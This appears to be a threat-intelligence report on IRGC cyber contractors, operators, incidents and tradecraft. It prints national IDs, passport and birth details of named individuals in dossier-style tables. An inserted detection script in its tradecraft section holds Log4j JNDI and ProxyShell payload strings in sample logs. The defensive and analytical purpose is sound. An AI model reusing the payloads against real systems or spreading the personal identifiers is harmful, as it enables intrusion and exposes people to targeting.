IRGC CYBER ECOSYSTEM
FORENSIC INTELLIGENCE REPORT 2014-2026
From the "Contractor Model" to Cyber–Kinetic Convergence
LAST UPDATED: JANUARY 2026
Intelligence Assessment: This forensic report contains actionable intelligence on the IRGC offensive cyber ecosystem, including corporate fronts, operators, and state-aligned contractors engaged in cyber-enabled kinetic operations.
01 Why This Ecosystem Matters
Modern cyber conflict is not just about code. It is sustained by a human, organizational, and corporate backbone. What stands out from late 2024 through January 2026 is a clear shift: the IRGC and MOIS are no longer content with a neat separation between "espionage," "propaganda," and "disruption." Instead, they are pushing a doctrine of cyber-enabled kinetic operations.
At the same time, hacktivist disclosures (notably Lab Dookhtegan and Read My Lips), publicly unsealed indictments in September 2024, and sanctions against cyber contractors have made it possible to outline "who does what" inside the ecosystem.
Strategic Escalation: IRGC Cyber Operations Timeline (Q4 2024 – Jan 2026)
- U.S. DOJ indicts APT42 members (incl. Masoud Jalili) for compromising Trump campaign staff
- Trump campaign emails distributed to media outlets via "Robert" persona
- Fanava Group infiltrated, disrupting operations for 39 tankers and 25 cargo ships
- "Red Wave" analysis reveals 116 tankers compromised via deleted Falcon VSAT terminals
- Second wave findings confirm use of dd command to wipe vessel storage partitions
- Ali Aliakbar Ansari designated by UK for financing hostile IRGC destabilization activities
02 Command Architecture
The IRGC's offensive capabilities generally draw from two major lines:
- IRGC Intelligence Organization (IRGC-IO): domestic repression, counterintelligence, and targeting opposition abroad; cyber activity often emphasizes social engineering, credential theft, and communications monitoring.
- IRGC Electronic Warfare & Cyber Defense Organization (IRGC-EWCD): despite the "defense" label, it is frequently associated with operations aimed at sensitive infrastructure and strategic targets.
Cyber is no longer a nuisance tool; it is increasingly integrated into core regime objectives.
IRGC Cyber Proxy Network: Command and Control Structure
Figure 1: The operational hierarchy linking the IRGC Intelligence Organization (IRGC-IO) to its primary front companies.
03 The Contractor Model & Corporate Mask
A central finding is the IRGC's institutionalized Contractor Model: legally registered, pseudo-private entities execute state-directed operations and, in some instances, participate in financially motivated cybercrime—an arrangement often described as "state-tolerated moonlighting."
Three recurring nodes in this model:
- Najee Technology Hooshmand Fater LLC
- Afkar System Yazd Company
- Emennet Pasargad and earlier brand names
| Company | Corporate National ID | Reg. No. | Address | Postal Code |
|---|---|---|---|---|
| Najee Technology Hooshmand Fater | 14008335397 | 36157 | Karaj, Rajaee Shahr, Phase 3... | 3146815441 |
| Afkar System Yazd | 10860176637 | — | Yazd, Central Area, 31st Alley... | 8916984626 |
| Emennet Pasargad | — | — | Tehran (details changed over time) | — |
04 The Human Layer: Executives & Operators
This ecosystem ultimately runs on people: executives who manage the corporate cover and operators who conduct intrusion, persistence, and data collection.
Leadership & Management
| Name (English) | Name (Farsi) | Role | DOB | National ID | Place of Birth |
|---|---|---|---|---|---|
| Mansour Ahmadi | منصور احمدی | Managing Director, Najee | 07 Jul 1988 | 0453740243 | Shemiran, Tehran |
| Ahmad Khatibi Aghda | احمد خطیبی عقدا | Managing Director, Afkar | 21 Mar 1977 | — | Ardakan, Yazd |
Mansour Ahmadi represents a younger cohort of trusted technical managers; Ahmad Khatibi Aghda is older and may bridge traditional command layers and younger technical teams.
Operatives & Facilitators
| Name (English) | Name (Farsi) | DOB | National ID | Passport | Place of Birth |
|---|---|---|---|---|---|
| Amir Hossein Nikaeen Ravari | امیرحسین نیکآئین راوری | 13 Apr 1992 | 4480046429 | — | Meybod, Yazd |
| Aliakbar Rashidi-Barjini | علیاکبر رشیدی بارجینی | 30 Apr 1991 | 4480034870 | — | Meybod, Yazd |
| Mohammad Shakeri-Ashtijeh | محمد شاکری اشتیجه | 28 Nov 1997 | 0371588723 | B50759562 | Qom |
| Mojtaba Haji Hosseini | مجتبی حاجی حسینی | 1991 | 4480031332 | — | Meybod, Yazd |
| Mostafa Haji Hosseini | مصطفی حاجی حسینی | 1991 | 4480031340 | — | Meybod, Yazd |
| Mohammad Agha Ahmadi | محمد آقااحمدی | 01 Mar 1995 | 4890244441 | — | Savojbolagh, Alborz |
| Ali Agha-Ahmadi | علی آقااحمدی | — | 4899768060 | — | Savojbolagh, Alborz |
Early-to-mid 1990s birth years and geographic clustering (notably Yazd/Meybod) point to localized recruitment around specific contractors.
05 APT42 / Mint Sandstorm & September 2024 Indictments
The cluster tracked as APT42 / Mint Sandstorm is characterized as a highly targeted, HUMINT-aligned capability: interactive social engineering, credible professional personas, and precise targeting of individuals and campaigns.
The 2024 U.S. Election Operation
In charging documents unsealed in September 2024, three individuals were accused of executing a targeted hacking campaign against email accounts associated with the U.S. presidential election (with specific attention to the Donald Trump campaign) and then attempting to move the stolen material into political and media circulation.
Indicted Operators
| Name | Operational Description | DOB | Place of Birth | Aliases / Notes | Status |
|---|---|---|---|---|---|
| Masoud Jalili | Access acquisition; alias: "1028" | 08 Dec 1987 | Tehran | Birth Cert No: 49332 | Indicted; sanctioned |
| Seyyed Ali Aghamiri | Social engineering / infrastructure | 24 Jun 1990 | Tehran | Black hair, hazel eyes | Indicted Sep 2024 |
| Yaser Balaghi | Technical intrusion support | 19 Sep 1988 | Tehran | Wool3n.H4t; ~2014 (Rocket Kitten) | Indicted Sep 2024 |
Target Dossier: Indicted Mint Sandstorm Operatives (Sep 2024)
Personally identifiable information for the three primary Mint Sandstorm operatives indicted for the 2024 Trump campaign hack.
- Masoud Jalili: aliases Masud Jalili, Mas'ud Jalili, "1028"
- Seyyed Ali Aghamiri
- Yaser Balaghi: aliases Wool3n.H4t; ~2014 (Rocket Kitten)
06 Contractor Lineage: Emennet Pasargad
To understand the present, you have to trace the earlier contractor lineage:
- Emennet Pasargad (and earlier names) is described as a key precedent for the Contractor Model and was associated with earlier election interference (2020).
- Behzad Mesri (alias: Skote Vahshat) and the 2017 HBO incident illustrate a hybrid profile: criminal extortion alongside analytical proximity to state-aligned clusters.
| Name | Alias | DOB | Place of Birth | National ID | Analytical Note |
|---|---|---|---|---|---|
| Behzad Mesri | Skote Vahshat | 26 Aug 1988 | Naghadeh | 2909905624 | Hybrid threat: financial crime + state ties |
07 Hacktivist Counter-Intelligence
On the opposing side, hacktivist activity has imposed real operational friction by exposing identities and contractor data.
These disclosures, especially those tied to Najee and related clusters such as "Sahand," have produced psychological pressure, forced personnel rotation, and corporate restructuring.
08 Cyber to Kinetic: The Fanava Incident
Cyber–kinetic convergence becomes concrete when digital access produces operational, physical-world consequences.
The Fanava Group Incident (August 2025)
A supply-chain compromise involving Fanava Group reportedly resulted in the removal or disabling of Falcon software across systems connected to maritime platforms. The stated outcome: disruption affecting 116 vessels (including 39 tankers and 25 cargo ships).
Examples of disclosed internal structure (directory names):
- mitarbeiter (employee records)
- admin-login (administrator login data)
- fanava-payments (payment/transaction logs)
- acceptor-contacts (merchant/customer contact data)
- shahrestans (geographic/service coverage data)
Kinetic-Aligned Clusters
- Tortoiseshell (Imperial Kitten / Crimson Sandstorm / TA456): focused on operational preparation (OPE), AIS mapping, and even CCTV access.
- Hexane (Lyceum / MarnanBridge): telecom/energy focus with a supply-chain orientation.
09 Domestic Control: Companies & Surveillance
Domestic control is the second major pillar: firms enabling filtering, DPI, VPN suppression, and influence operations.
Key Firms and Executives
| Company | Role | Key Executive | Title | Location |
|---|---|---|---|---|
| Sahab Pardaz | Social media filtering, DPI, censorship | Mohammad Zandi Aliabadi | Chair | Tehran |
| Sahab Pardaz | — | Hossein Zandi Aliabadi | Vice Chair | Tehran |
| Sahab Pardaz | — | Fatemeh Haghshenas | CEO | Tehran |
| Douran Software | VPN blocking, content control | Alireza Abedinejad | CEO | Tehran |
| Douran Software | — | Amer Najafianpour | Chair | Tehran |
| Douran Software | — | Soheila Kasaei | Vice Chair | Tehran |
| Ravand Cybertech | Influence ops; attributed to MOIS | (entity-level) | — | Toronto |
Reported Sahab Pardaz office locations:
- Tehran, Khorramshahr St., No. 22
- Tehran, North Shohvardi St., Khorramshahr St., No. 24, Floor 1
Surveillance-Ready Platforms
- Rubika: described as a domestic "super-app" with an ownership/influence chain (Tosca → MCI → TCI).
- Soroush Plus: developed by Setak Houshmand Sharif and attributed to the state broadcaster.
10 Military-Academic Integration: MUT
MUT is described as a key R&D node connected to MODAFL, spanning cyber defense, cryptography, and sensitive technologies.
Named figures:
- Ebrahim Mahmudzadeh: MUT faculty; TCI board chair; former CEO of Iran Electronic Industries (IEI)
- Mohammad Shakibazad: cyber defense / smart cards / risk management
- Also: Moslem Najafi, Ali Jabar Rashidi, Mohsen Shekarbaigi
- Fatemeh Ganji: PUFs research (hardware security)
11 Financial & Strategic Enablers
Cross-border operations require finance and logistics.
| Name | Function | Key Details | DOB | Place of Birth |
|---|---|---|---|---|
| Ali Aliakbar Ansari | Financial/logistics node | Passports: Iran, St Kitts, Cyprus; Dubai | 26 Dec 1968 | Ghazvin |
| Ali Hoseynitash | Strategic command | IRGC BG; head of SNSC strategic dept | — | — |
| Mojtaba Haeri | Industrial oversight | MODAFL industrial deputy; AIO/DIO | — | — |
| Nader Saedi | Legacy threat | Sun Army / Mersad | — | — |
| Mostafa Sadeghi | Legacy threat | Mabna Institute | — | — |
12 Tradecraft & TTPs
The dominant pattern is rapid exploitation of publicly known vulnerabilities (N-day) rather than expensive zero-days.
Common motifs include:
- Unpatched VPN and mail server targeting: Fortinet FortiOS, Microsoft Exchange (ProxyShell), Log4j
- Ransomware using legitimate tooling: BitLocker as a "living off the land" approach
- Infrastructure: reliance on leased VPS for command-and-control
- Interactive social engineering: credible personas (journalist/researcher) and long rapport-building
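The N-day and living-off-the-land motifs above leave recognisable traces in ordinary web, application and endpoint logs. The following detection sketch is an added example, not part of this report and not the work of any party it names: three narrow heuristics (the Log4j lookup syntax in request fields, Autodiscover requests carrying an '@' in the URL as seen in ProxyShell path confusion, and BitLocker encryption being switched on from the command line) are run over a handful of constructed log lines. The rule names, the log format and every sample event are assumptions made for the example; the host names, IP address and domain are reserved or invented values.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Detection heuristics keyed to the TTP motifs listed in the report. Each entry
# is a (tag, compiled regex) pair applied to one log line. The patterns are
# deliberately narrow so that a hit is worth an analyst's time; tag names are
# this example's own choice, not a standard taxonomy.
RULES: List[Tuple[str, re.Pattern]] = [
    # Log4j: the JNDI lookup syntax appearing in any logged request field
    # (user agent, header, parameter) is almost never legitimate traffic.
    ("log4j_jndi_lookup", re.compile(r"\$\{jndi:", re.IGNORECASE)),
    # Exchange ProxyShell path confusion: Autodiscover requests whose URL
    # contains an '@' after the query string; real Autodiscover clients do not.
    ("exchange_autodiscover_path_confusion",
     re.compile(r"/autodiscover/autodiscover\.json\?[^ ]*@", re.IGNORECASE)),
    # BitLocker as ransomware: encryption being enabled via manage-bde -on or
    # the Enable-BitLocker cmdlet. Status queries (-status) are not flagged.
    ("bitlocker_encryption_enabled",
     re.compile(r"manage-bde(\.exe)?\s+-on\b|Enable-BitLocker", re.IGNORECASE)),
]


def classify(line: str) -> Optional[str]:
    """Return the tag of the first rule that matches the line, or None."""
    for tag, pattern in RULES:
        if pattern.search(line):
            return tag
    return None


def scan(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Run every line through the rules and keep (tag, line) pairs for hits."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        tag = classify(line)
        if tag is not None:
            hits.append((tag, line.strip()))
    return hits


# Constructed sample events for the example (not from any real incident):
# three should fire, two are benign look-alikes that must stay quiet.
SAMPLE_LOGS = [
    '2025-08-03T02:14:07Z web01 GET /autodiscover/autodiscover.json?@example.invalid/mapi/nspi/ 200',
    '2025-08-03T02:15:11Z web01 GET /autodiscover/autodiscover.xml 401',
    '2025-08-03T02:20:30Z app02 User-Agent: ${jndi:ldap://203.0.113.9/a}',
    '2025-08-03T03:02:44Z ws17 ProcessCreate ParentImage=cmd.exe CommandLine="manage-bde.exe -on D: -RecoveryPassword -UsedSpaceOnly"',
    '2025-08-03T03:05:10Z ws17 ProcessCreate ParentImage=explorer.exe CommandLine="manage-bde.exe -status C:"',
]

if __name__ == "__main__":
    for tag, line in scan(SAMPLE_LOGS):
        print(f"[{tag}] {line}")
```

In practice each rule would feed a SIEM alert with its own triage note: the BitLocker rule in particular needs an allow-list for deployment tooling that legitimately enables encryption, otherwise it fires on every imaging run.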
13 Closing Assessment
As of early 2026:
- The IRGC cyber ecosystem is increasingly integrated with kinetic objectives and political warfare (maritime disruption and election operations).
This is not just "data theft." It is a blended model of human-centric intrusion, political influence operations, cyber-to-operations effects, and tech-enabled domestic control.
END OF REPORT